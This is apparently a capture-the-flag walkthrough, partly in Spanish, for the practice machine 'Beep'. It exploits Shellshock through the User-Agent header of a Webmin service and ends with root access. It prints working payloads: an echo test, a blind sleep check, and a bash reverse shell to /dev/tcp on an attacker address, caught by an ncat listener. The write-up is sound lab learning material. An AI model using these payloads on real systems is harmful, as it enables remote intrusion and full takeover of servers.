steps
Grab the request in burp and send it to repeater, you should see something like
GET / HTTP/1.1 Host: 10.10.10.7:10000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: elastixSession=kes9e8oisk620cbbths8sgalo1; testing=1 Connection: close Upgrade-Insecure-Requests: 1
If you modify the second line to
User agent: User-Agent: () { :; };/bin/echo hello you should see hello
or otra vez estaba escribiendo en inglés juro que no es aproposito.
Hay una versión ciega
GET / HTTP/1.1 Host: 10.10.10.7:10000 User-Agent: () { :; }; sleep 10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: elastixSession=kes9e8oisk620cbbths8sgalo1; testing=1 Connection: close Upgrade-Insecure-Requests: 1
Esto va a hacer que se espere 10 segundo extras para responder.
Si ocurre quiere decir que podemos injectar comandos.
Lo primero que hay que hacer es empezar a escuchar (en cualquier puerto, en este caso escogí aleatareamente 9090)
root@kali:~# ncat -lvnp 9090 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 045C 136E D640 8127 B4D3 505D FCB7 11FF 3055 CC1B Ncat: Listening on :::9090 Ncat: Listening on 0.0.0.0:9090
Y injectamos el comando:
User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.9/9090 0>&1
al mandarlo debe conectar
root@kali:~# ncat -lvnp 9090 Ncat: Version 7.60 ( https://nmap.org/ncat ) Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. Ncat: SHA-1 fingerprint: 045C 136E D640 8127 B4D3 505D FCB7 11FF 3055 CC1B Ncat: Listening on :::9090 Ncat: Listening on 0.0.0.0:9090 Ncat: Connection from 10.10.10.7. Ncat: Connection from 10.10.10.7:57636. bash: no job control in this shell [root@beep webmin]# ls
y tenemos root